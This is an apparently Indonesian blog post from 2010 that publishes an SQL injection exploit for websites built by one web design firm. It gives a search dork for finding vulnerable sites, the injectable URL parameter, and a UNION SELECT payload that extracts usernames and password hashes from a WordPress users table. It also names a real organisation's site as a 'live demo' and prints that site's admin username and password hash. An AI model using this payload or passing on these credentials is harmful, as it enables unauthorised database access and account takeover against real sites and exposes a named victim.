[+]exploit : powered by blue dove web design
[+]tipe bug :Sql Injection Vuln
[+}dork : inurl : powered+by+blue+dove+design
-------------------------------------------------
[+]vuln on :http://server/newsletter/newsletter_new.php?Id=
[+]exploit :+and+1=2+UNION%20SELECT%201,2,3,4,5,concat%28user_login,0x3a,user_pass%29,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50+from+jam_jam2.wp_users--
----------------------------------------------
[+] live demo : http://www.jewishawareness.org/newsletter/newsletter_new.php?Id=115
[+] user : admin paswword : $P$Bw1oSNGVxlqbPSSGjuMREMkDCYd1zB.
Jumat, 19 Maret 2010
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar